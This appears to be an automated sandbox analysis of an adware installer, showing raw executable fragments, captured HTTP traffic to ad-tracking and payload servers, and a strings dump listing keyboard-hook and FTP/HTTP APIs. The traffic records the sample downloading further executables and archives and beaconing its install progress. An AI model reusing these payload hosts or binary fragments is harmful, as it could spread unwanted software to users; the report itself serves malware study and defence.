M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...H.@..E...E.P.E.P.u...`.@..u....E..9}...w....~X.te.v4..L.@....E.tU.}.j.W.E......E.......P.@..vXW..T.@..u..5X.@.W...E..E.h ...Pj.h.[B.W..d.@..u.W...u....E.P.u...h.@._^3.[.....L$..(cB...Si.....VW.T.....tO.q.3.;5,cB.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5,cB.r._^[...U..QQ.U.SV..i....

<<< skipped >>>

GET /cgi-bin/advert/getkws.cgi?did=90068&version=0&key=azJJ.s8MVPsHc HTTP/1.1

User-Agent: gmsd_re_005010096-1.20

Host: ads.under-myscreen.be

Accept: */*

Accept-Encoding: gzip, deflate

Referer:

Cookie:

Accept-Language: en,en-US

X-Guuid: 75ed9567-aa58-4c8e-a8ea-3cad7c47ab03

X-OS-Ver: 5.1.2.2600

HTTP/1.1 200 OK

Date: Fri, 25 Sep 2015 22:46:30 GMT

Server: Apache/2.2.16 (Debian) mod_ssl/2.2.16 OpenSSL/0.9.8o mod_wsgi/3.3 Python/2.6.6 mod_perl/2.0.4 Perl/v5.10.1

X-C4PC-ServerName: ads.under-myscreen.be

Set-Cookie: _c4aid=75ED9567AA584C8EA8EA3CAD7C47AB03; expires=Wed, 23 Mar 16 22:46:00 GMT; domain=under-myscreen.be; path=/;

Set-Cookie: _c4aid2=75ED9567AA584C8EA8EA3CAD7C47AB03,1443221190.42548; expires=Wed, 23 Mar 16 22:46:00 GMT; domain=under-myscreen.be; path=/;

Connection: close

Transfer-Encoding: chunked

Content-Type: text/javascript

1f1..{"dids":{"90077":{"unmatch":["regiedepub.com|under-myscreen.be|eorezo.com|regiedepub.com"],"match":[{"u":0,"m":"yahoo|live|wikipedia|bing|msn|amazon|tumblr|royalbank|reddit|ebay"},{"u":0,"m":"pinterest|apple|ask|microsoft|bmo|wordpress|cibc|paypal|baidu|cbc"},{"u":0,"m":"xhamster"},{"u":0,"m":"xvideos|imbd|instagram|netflix|craigslist|kickass|td|thepiratebay"},{"u":0,"m":"http|fa|go|yah|hot|twit|blog|msn|apple|facebook|google|twitter|youtube"}]}},"freeze":3600,"refresh":3600,"version":116556}..0..

GET /finalinstaller/24.08.2015/FinalInstaller_dotnet4.exe HTTP/1.1

Connection: Keep-Alive

Host: d22nes4susdva1.cloudfront.net

HTTP/1.1 200 OK

Content-Type: application/octet-stream

Content-Length: 3030016

Connection: keep-alive

Date: Mon, 24 Aug 2015 06:58:00 GMT

Last-Modified: Mon, 24 Aug 2015 06:48:08 GMT

ETag: "a3078153a7a53bfc0a7a0b8fd20d757a"

Accept-Ranges: bytes

Server: AmazonS3

Age: 69614

X-Cache: Hit from cloudfront

Via: 1.1 affe26bf02a36a4a45ea1eb3ce2b4a62.cloudfront.net (CloudFront)

X-Amz-Cf-Id: GQKorADvQepenzx1GtyWuoYr9XO72LsJBKzGeiEXKvES-AOk9YhZXA==

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...z..U.................|-...........-.. ........@.. ................................/...@.................................@.-.K.....-......................`........-.............................................. ............... ..H............text....{-.. ...|-................. ..`.rsrc.........-......~-.............@..@.reloc.......`.......:..............@..B................p.-.....H.......PD%.TV.......'......._ ..........................................(.'..*.r.(......}......}......}....*....(....o....*.0../.......(.'....o.............(\'.....r...p...(1'.....(B'.....( '.....r...p...(5'....(....()'..o....,.r...p*.o....(*'..(Z'..(X'..r...p(....()'..o....,.(*'..(Z'..(X'..r...p(....()'..*.o..............(]'.....(6'.....(5'.....(B'.....(]'.....(Z'.....(]'.....(?'.....(.'......(D'......r...p..(....()'..o....,.r...p*.*..0..4.......r!..pr...p.(......,..o....(....o.........&..~....*.*........)).......0..4.......r...pr...p.(......,..o....(....o.........&..~....*.*........))........*...$.](m...&*2..(....&..Z*....0..........rm..p..c.d(....&..(......*..2..(....&..Z*....0..........r...p..c.d(....&..(......*..2..(....&..Z*....0..........r...p..c.d(....&..(......*..2..(....&..Z*....0..........r...p..c.d(....&..(......*..2..(....&..Z*....0..........r...p..c.d(....&..(......*..2..(....&..Z*....0..........r...p..c.d(....&..(......*..2..(....&..Z*....0..........r...p..c.d(....&..(......*..2..(....

<<< skipped >>>

GET /crossbrowse/ie/107/ie.zip.001 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

Host: zip.rgbdomsrv.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Fri, 25 Sep 2015 22:45:25 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1441008912"

Last-Modified: Mon, 31 Aug 2015 08:15:12 GMT

Cache-Control: max-age=40693

Content-Length: 8244985

Content-Type: text/plain; charset=UTF-8

X-HW: 1443221126.dop006.fr7.t,1443221125.cds027.fr7.c

PK........l..G...nd.T.d.T.....chrome.packed.7z7z..'.....T...T.............*..F......8%D.cT(g.....,r...E^<5....S$<....Z..*...7&.o.,.a&......%...1..5...m...h..=w.|.a.a.Q.{.<..:..9Q,>n...k.....~..aJ.._...KD.V...7.>..3....d......)..6.H..RN...:.....FU.!..j...9....L.&.2.a........ .E.s'T.......vD.z)..}..-.. .&.vF}.$.z.......lw.>..!...'.a..|...L....09E..Y8^.s.O\..C..%.......d.VD....W..d.'..6%...l.7Gk.<..I...5...d !......wT...d...H..7v.E.......{.p.]`.......~w84.rj......;...).q.k..G...........zL...{....>.."........"q..k[.f...F{8...s..c>[69..|...q].(.S..~..1z..>.!AT&i.}....YJ....\i....o..(...4.5.......h|.......6.!...4.p[....@.m.. ^&...A..&E..V.]...T=.v]W.l=A=y.T....R.'f.....60..MR...k...c.1."..jw.7C.N...b....@...@....%..%*!5............iW*y..*......E...D....6....3.P....2.....} .'..!...cG.m...Z.]%{.QZ./e.V-C.a.X.aQ?.....S..1...:.T..C*..hKH....(...aH.r..;..^.l.ikR.X..8..._...^T{B@..'.tga.3."..<. ...........$c9......... .~)/..%.2{...X&.W.....>...bh.L.....U.-.Vf......r..d..9. ..k.'.M...J...v...rU..`3...SWX...G1.`....{.....8.~..x..Q...g.._...1.9.......f8..#p..............]...E.(....J....(H.h..6@'.hc.5....}.1>{..6/.R.....(X.k.<....\.....:p...u..L.....h...K...vaK./.O........'|...8..2...{..9....."&.......Z..K.eJ..4e..)v..[...J$.e........5.G......X..@.o.^Y...%....._.n.:...\......H...0,.f.E...*M.F.f.R.lJ*,...S.....FE*'b.#V.@........a=._.....W... .}.....p.~..(>.....E.1k....3k....F..[.T...,N...............Y7.......G[....rH).E......[.5..K..Q..J#8.-.@.]<eh........2a.c.8...Z....O.....z..2c

<<< skipped >>>

GET /cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=142493&tag=RE_CLICKMEIN_INSTALL_INI HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Accept: */*

User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Host: ads.regiedepub.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Fri, 25 Sep 2015 22:46:24 GMT

Server: Apache/2.2.16 (Debian) mod_ssl/2.2.16 OpenSSL/0.9.8o mod_wsgi/3.3 Python/2.6.6 mod_perl/2.0.4 Perl/v5.10.1

Content-Location: settags.cgi

Vary: negotiate

TCN: choice

Cache-Control: no-store, no-cache, must-revalidate

X-C4PC-ServerName: ads.regiedepub.com

P3P: policyref="hXXp://ads.regiedepub.com/w3c/p3p.xml",CP="NON DSP COR CURa PSA PSD OUR BUS NAV STA"

Expires: Fri, 25 Sep 15 22:46:00 GMT

Set-Cookie: _c4aid=7117B4EAD2AE47B1A52740D5241A664B; expires=Wed, 23 Mar 16 22:46:00 GMT; domain=regiedepub.com; path=/;

Set-Cookie: _c4aid2=7117B4EAD2AE47B1A52740D5241A664B,1443221184.57749; expires=Wed, 23 Mar 16 22:46:00 GMT; domain=regiedepub.com; path=/;

Connection: close

Transfer-Encoding: chunked

Content-Type: text/javascript

41.......if (window.rdp_callback).....rdp_callback(1203, 142493);......0..

GET /utility.gif?report=fdata&f=4&c=003266&i=100&n=install_browser_start_async&ibic=8fa23ef88ff78dd88c0c9eef405f1630&rnd=8864 HTTP/1.1

Accept: */*

Host: err.rgbdomsrv.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

x-amz-id-2: UFBDNmnt6rS4w8afrX4BcyshylNY8tqx53lOZbWuSu6TRAf34ZAscPxtEuOa6INDvkzQJiDohVo=

x-amz-request-id: DB8ACFE45D99CE26

Date: Fri, 25 Sep 2015 22:45:26 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;....

GET /utility.gif?report=fdata&f=4&c=003266&i=250&n=install_browser_downloading&ibic=8fa23ef88ff78dd88c0c9eef405f1630&rnd=6496 HTTP/1.1

Accept: */*

Host: err.rgbdomsrv.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

x-amz-id-2: c9aH3qj3/n42qjpDqWF2zAldMWFGxU1Uy6ImiwbfmCt/kAOj9jGVV1hcVb6WsP5ZpdGQ32KsZ7k=

x-amz-request-id: F5966C8CC5540619

Date: Fri, 25 Sep 2015 22:45:27 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;....

GET /utility.gif?report=fdata&f=4&c=003266&i=270&n=install_browser_all_thread_created_success&ibic=8fa23ef88ff78dd88c0c9eef405f1630&rnd=715 HTTP/1.1

Accept: */*

Host: err.rgbdomsrv.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

x-amz-id-2: tDspsDOXcDyfJ6Go7K F67M/69GeTNGtf8Tadk42VkUfZ8O7Y4pwmwG/ZtGM pyyTfhBTxZOgbY=

x-amz-request-id: B2B2021B6E709490

Date: Fri, 25 Sep 2015 22:45:27 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: tDspsDOXcDyfJ6Go7K F67M/69GeTNGtf8Tadk42VkUfZ8O7Y4pwmwG/ZtGM pyyTfhBTxZOgbY=..x-amz-request-id: B2B2021B6E709490..Date: Fri, 25 Sep 2015 22:45:27 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalidate..Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT..ETag: "28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Server: AmazonS3..GIF89a.............,...........D..;....

GET /utility.gif?report=fdata&f=4&c=003266&i=310&n=install_browser_all_thread_ended_success&ibic=8fa23ef88ff78dd88c0c9eef405f1630&rnd=1932 HTTP/1.1

Accept: */*

Host: err.rgbdomsrv.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

x-amz-id-2: tNnPeAT XnTTXoeVwTSoB9leKhoKgD2G3CA/d4hEiu2ZHdTC0KOVYLoy t6gfip0P7WGGF6LkUs=

x-amz-request-id: 927F066C2DCEE3CF

Date: Fri, 25 Sep 2015 22:45:34 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: tNnPeAT XnTTXoeVwTSoB9leKhoKgD2G3CA/d4hEiu2ZHdTC0KOVYLoy t6gfip0P7WGGF6LkUs=..x-amz-request-id: 927F066C2DCEE3CF..Date: Fri, 25 Sep 2015 22:45:34 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalidate..Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT..ETag: "28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Server: AmazonS3..GIF89a.............,...........D..;....

GET /utility.gif?report=fdata&f=4&c=003266&i=360&n=install_browser_all_files_in_place&ibic=8fa23ef88ff78dd88c0c9eef405f1630&rnd=4546 HTTP/1.1

Accept: */*

Host: err.rgbdomsrv.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

x-amz-id-2: k2QV8FgigupMMQS Q8QqTLKcKPYpWvV4FTUtDIQK4hd TU4MB27IcmAqpwLyL7VMJg0rkS0ljh4=

x-amz-request-id: 84878FB945610163

Date: Fri, 25 Sep 2015 22:45:37 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: k2QV8FgigupMMQS Q8QqTLKcKPYpWvV4FTUtDIQK4hd TU4MB27IcmAqpwLyL7VMJg0rkS0ljh4=..x-amz-request-id: 84878FB945610163..Date: Fri, 25 Sep 2015 22:45:37 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalidate..Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT..ETag: "28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Server: AmazonS3..GIF89a.............,...........D..;....

GET /utility.gif?report=fdata&f=4&c=003266&i=410&n=install_browser_install_ch_success&ibic=8fa23ef88ff78dd88c0c9eef405f1630&rnd=2118 HTTP/1.1

Accept: */*

Host: err.rgbdomsrv.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

x-amz-id-2: tSvohUTlKbM9 3yR Egr1rOJo7xhmup9qXo/CFXwi4A9YNipBK/Htj Vpv1KOcVCYues03wo6y4=

x-amz-request-id: 225073E7BCEEC1D3

Date: Fri, 25 Sep 2015 22:45:46 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: tSvohUTlKbM9 3yR Egr1rOJo7xhmup9qXo/CFXwi4A9YNipBK/Htj Vpv1KOcVCYues03wo6y4=..x-amz-request-id: 225073E7BCEEC1D3..Date: Fri, 25 Sep 2015 22:45:46 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalidate..Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT..ETag: "28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Server: AmazonS3..GIF89a.............,...........D..;....

GET /utility.gif?report=fdata&f=4&c=003266&i=480&n=install_browser_end_success&ibic=8fa23ef88ff78dd88c0c9eef405f1630&rnd=9936 HTTP/1.1

Accept: */*

Host: err.rgbdomsrv.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

x-amz-id-2: pBrZ079IOmdCgJcOGAVpmdcHi/BGPQszqv9XrumvJ3WC6m1ynJ0A1p3oYca5NVj0Gcaw3fRfZyc=

x-amz-request-id: C4D1968177D3D15D

Date: Fri, 25 Sep 2015 22:45:47 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: pBrZ079IOmdCgJcOGAVpmdcHi/BGPQszqv9XrumvJ3WC6m1ynJ0A1p3oYca5NVj0Gcaw3fRfZyc=..x-amz-request-id: C4D1968177D3D15D..Date: Fri, 25 Sep 2015 22:45:47 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalidate..Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT..ETag: "28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Server: AmazonS3..GIF89a.............,...........D..;..

Map

The SpyTool connects to the servers at the folowing location(s):

Strings from Dumps

upgmsd_re_005010096.exe_1276:

.text

.text

`.rdata

`.rdata

@.data

@.data

.rsrc

.rsrc

@.reloc

@.reloc

RSSSSSSh

RSSSSSSh

QSShh

QSShh

tFHt:Ht.Ht"Hu`

tFHt:Ht.Ht"Hu`

SSSShp

SSSShp

SSSSh

SSSSh

u$SShe

u$SShe

tWSShW

tWSShW

tl9_ tgSSh

tl9_ tgSSh

t'SShl

t'SShl

SSSShxjn

SSSShxjn

j%XtL9E

j%XtL9E

FtPW

FtPW

SSh@B

SSh@B

u.SSh

u.SSh

tsSSh

tsSSh

FTCP

FTCP

t.WWWSP

t.WWWSP

tAHt.HHt

tAHt.HHt

FTPS

FTPS

u)SShF

u)SShF

s%j.Zf

s%j.Zf

xSSSh

xSSSh

FTPjKS

FTPjKS

FtPj;S

FtPj;S

C.PjRV

C.PjRV

operand of unlimited repeat could match the empty string

operand of unlimited repeat could match the empty string

POSIX named classes are supported only within a class

POSIX named classes are supported only within a class

erroffset passed as NULL

erroffset passed as NULL

POSIX collating elements are not supported

POSIX collating elements are not supported

this version of PCRE is not compiled with PCRE_UTF8 support

this version of PCRE is not compiled with PCRE_UTF8 support

PCRE does not support \L, \l, \N, \U, or \u

PCRE does not support \L, \l, \N, \U, or \u

support for \P, \p, and \X has not been compiled

support for \P, \p, and \X has not been compiled

(*VERB) with an argument is not supported

(*VERB) with an argument is not supported

!"#$%&'((()* ,-./01

!"#$%&'((()* ,-./01

CNotSupportedException

CNotSupportedException

CCmdTarget

CCmdTarget

RegOpenKeyTransactedW

RegOpenKeyTransactedW

RegCreateKeyTransactedW

RegCreateKeyTransactedW

RegDeleteKeyTransactedW

RegDeleteKeyTransactedW

CFtpFileFind

CFtpFileFind

CHttpConnection

CHttpConnection

CFtpConnection

CFtpConnection

CHttpFile

CHttpFile

RegDeleteKeyExW

RegDeleteKeyExW

TaskDialogIndirect

TaskDialogIndirect

CMDITabProxyWnd

CMDITabProxyWnd

CMDIChildWndEx

CMDIChildWndEx

CMDIFrameWndEx

CMDIFrameWndEx

CMDIChildWnd

CMDIChildWnd

CMDIFrameWnd

CMDIFrameWnd

CMDIClientAreaWnd

CMDIClientAreaWnd

CHotKeyCtrl

CHotKeyCtrl

CMFCToolBarsKeyboardPropertyPage

CMFCToolBarsKeyboardPropertyPage

GetProcessWindowStation

GetProcessWindowStation

operator

operator

portuguese-brazilian

portuguese-brazilian

qR.Rd

qR.Rd

Visual C CRT: Not enough memory to complete call to strerror.

Visual C CRT: Not enough memory to complete call to strerror.

Broken pipe

Broken pipe

Inappropriate I/O control operation

Inappropriate I/O control operation

Operation not permitted

Operation not permitted

%%X

%%X

RegSetKeySecurity error! (rc=%lu)

RegSetKeySecurity error! (rc=%lu)

Key not found.

Key not found.

Error opening key.

Error opening key.

ntdll.dll

ntdll.dll

?456789:;

?456789:;

!"#$%&'()* ,-./0123

!"#$%&'()* ,-./0123

LookupPrivilegeValue error: %u

LookupPrivilegeValue error: %u

Error %d: Could not begin update of %s

Error %d: Could not begin update of %s

Error %d: Updating resource

Error %d: Updating resource

!"#$%&'()* ,-./:;?@[\]^_`{|}~

!"#$%&'()* ,-./:;?@[\]^_`{|}~

C:\appbuilder_2.0_multiinstall\Release\temp.pdb

C:\appbuilder_2.0_multiinstall\Release\temp.pdb

IPHLPAPI.DLL

IPHLPAPI.DLL

PSAPI.DLL

PSAPI.DLL

GetProcessHeap

GetProcessHeap

GetWindowsDirectoryW

GetWindowsDirectoryW

GetCPInfo

GetCPInfo

KERNEL32.dll

KERNEL32.dll

GetKeyState

GetKeyState

SetWindowsHookExW

SetWindowsHookExW

CreateDialogIndirectParamW

CreateDialogIndirectParamW

UnhookWindowsHookEx

UnhookWindowsHookEx

MsgWaitForMultipleObjectsEx

MsgWaitForMultipleObjectsEx

GetAsyncKeyState

GetAsyncKeyState

MapVirtualKeyW

MapVirtualKeyW

GetKeyboardLayout

GetKeyboardLayout

GetKeyboardState

GetKeyboardState

GetKeyNameTextW

GetKeyNameTextW

MapVirtualKeyExW

MapVirtualKeyExW

EnumChildWindows

EnumChildWindows

USER32.dll

USER32.dll

GetViewportExtEx

GetViewportExtEx

SetViewportOrgEx

SetViewportOrgEx

OffsetViewportOrgEx

OffsetViewportOrgEx

SetViewportExtEx

SetViewportExtEx

ScaleViewportExtEx

ScaleViewportExtEx

GetViewportOrgEx

GetViewportOrgEx

GDI32.dll

GDI32.dll

MSIMG32.dll

MSIMG32.dll

COMDLG32.dll

COMDLG32.dll

WINSPOOL.DRV

WINSPOOL.DRV

RegLoadKeyW

RegLoadKeyW

RegUnLoadKeyW

RegUnLoadKeyW

RegOpenKeyExW

RegOpenKeyExW

RegCloseKey

RegCloseKey

RegCreateKeyExW

RegCreateKeyExW

RegSetKeySecurity

RegSetKeySecurity

RegDeleteKeyW

RegDeleteKeyW

RegEnumKeyExW

RegEnumKeyExW

RegQueryInfoKeyW

RegQueryInfoKeyW

RegEnumKeyW

RegEnumKeyW

ADVAPI32.dll

ADVAPI32.dll

ShellExecuteW

ShellExecuteW

ShellExecuteExW

ShellExecuteExW

SHELL32.dll

SHELL32.dll

COMCTL32.dll

COMCTL32.dll

UrlUnescapeW

UrlUnescapeW

SHLWAPI.dll

SHLWAPI.dll

ole32.dll

ole32.dll

OLEAUT32.dll

OLEAUT32.dll

oledlg.dll

oledlg.dll

OLEACC.dll

OLEACC.dll

InternetCrackUrlW

InternetCrackUrlW

HttpOpenRequestW

HttpOpenRequestW

HttpSendRequestW

HttpSendRequestW

HttpQueryInfoW

HttpQueryInfoW

InternetCanonicalizeUrlW

InternetCanonicalizeUrlW

FtpDeleteFileW

FtpDeleteFileW

FtpRenameFileW

FtpRenameFileW

FtpCreateDirectoryW

FtpCreateDirectoryW

FtpRemoveDirectoryW

FtpRemoveDirectoryW

FtpSetCurrentDirectoryW

FtpSetCurrentDirectoryW

FtpGetCurrentDirectoryW

FtpGetCurrentDirectoryW

FtpPutFileW

FtpPutFileW

FtpGetFileW

FtpGetFileW

HttpAddRequestHeadersW

HttpAddRequestHeadersW

HttpEndRequestW

HttpEndRequestW

HttpSendRequestExW

HttpSendRequestExW

FtpOpenFileW

FtpOpenFileW

FtpCommandW

FtpCommandW

FtpFindFirstFileW

FtpFindFirstFileW

InternetOpenUrlW

InternetOpenUrlW

WININET.dll

WININET.dll

GdiplusShutdown

GdiplusShutdown

gdiplus.dll

gdiplus.dll

IMM32.dll

IMM32.dll

WINMM.dll

WINMM.dll

.PAVCOleException@@

.PAVCOleException@@

.PAVCException@@

.PAVCException@@

.PAVCObject@@

.PAVCObject@@

.PAVCMemoryException@@

.PAVCMemoryException@@

.PAVCSimpleException@@

.PAVCSimpleException@@

.PAVCNotSupportedException@@

.PAVCNotSupportedException@@

.PAVCInvalidArgException@@

.PAVCInvalidArgException@@

.?AVCNotSupportedException@@

.?AVCNotSupportedException@@

.PAVCArchiveException@@

.PAVCArchiveException@@

.?AVCCmdUI@@

.?AVCCmdUI@@

.?AVCTestCmdUI@@

.?AVCTestCmdUI@@

.PAVCUserException@@

.PAVCUserException@@

.PAVCResourceException@@

.PAVCResourceException@@

.?AVCFtpFileFind@@

.?AVCFtpFileFind@@

.?AVCFtpConnection@@

.?AVCFtpConnection@@

.?AVCHttpConnection@@

.?AVCHttpConnection@@

.?AVCHttpFile@@

.?AVCHttpFile@@

.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0BAA@@ATL@@

.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0BAA@@ATL@@

.?AV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@

.?AV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@

.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0EA@@ATL@@

.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0EA@@ATL@@

.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WV12@PB_W@@

.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WV12@PB_W@@

.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WPAVCDocument@@PAV3@@@

.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WPAVCDocument@@PAV3@@@

.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_W_N_N@@

.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_W_N_N@@

.?AV?$CMap@PAVCDocument@@PAV1@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_W@@

.?AV?$CMap@PAVCDocument@@PAV1@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_W@@

.?AVCToolCmdUI@@

.?AVCToolCmdUI@@

.?AVCMDITabProxyWnd@@

.?AVCMDITabProxyWnd@@

.?AVCMDIChildWndEx@@

.?AVCMDIChildWndEx@@

.?AVCMDIChildWnd@@

.?AVCMDIChildWnd@@

.?AVCMDIFrameWndEx@@

.?AVCMDIFrameWndEx@@

.?AVCMDIFrameWnd@@

.?AVCMDIFrameWnd@@

.?AVCMFCToolBarCmdUI@@

.?AVCMFCToolBarCmdUI@@

.?AVCKeyboardManager@@

.?AVCKeyboardManager@@

.PAVCOleDispatchException@@

.PAVCOleDispatchException@@

.?AV?$CList@PAVCMDIChildWndEx@@PAV1@@@

.?AV?$CList@PAVCMDIChildWndEx@@PAV1@@@

.?AVCMDIClientAreaWnd@@

.?AVCMDIClientAreaWnd@@

.?AVCMFCRibbonCmdUI@@

.?AVCMFCRibbonCmdUI@@

.?AV?$CArray@PAVCMFCRibbonKeyTip@@PAV1@@@

.?AV?$CArray@PAVCMFCRibbonKeyTip@@PAV1@@@

.?AVCMFCWindowsManagerDialog@@

.?AVCMFCWindowsManagerDialog@@

.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WPAUHMENU__@@PAU3@@@

.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WPAUHMENU__@@PAU3@@@

.?AVCMFCCmdUsageCount@@

.?AVCMFCCmdUsageCount@@

.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WPAVCObList@@PAV3@@@

.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WPAVCObList@@PAV3@@@

.?AVCMFCColorBarCmdUI@@

.?AVCMFCColorBarCmdUI@@

.?AV?$CMap@KKV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_W@@

.?AV?$CMap@KKV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_W@@

.?AVCMFCStatusBarCmdUI@@

.?AVCMFCStatusBarCmdUI@@

.?AVCMFCAcceleratorKey@@

.?AVCMFCAcceleratorKey@@

.?AVCHotKeyCtrl@@

.?AVCHotKeyCtrl@@

.?AVCMFCRibbonKeyTip@@

.?AVCMFCRibbonKeyTip@@

.?AVCOleCmdUI@@

.?AVCOleCmdUI@@

.?AVCMFCToolBarsKeyboardPropertyPage@@

.?AVCMFCToolBarsKeyboardPropertyPage@@

.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WHH@@

.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WHH@@

.?AVCMFCTasksPaneToolBarCmdUI@@

.?AVCMFCTasksPaneToolBarCmdUI@@

.?AVCMFCRibbonKeyboardCustomizeDialog@@

.?AVCMFCRibbonKeyboardCustomizeDialog@@

.?AVCMFCAcceleratorKeyAssignCtrl@@

.?AVCMFCAcceleratorKeyAssignCtrl@@

zcÁ

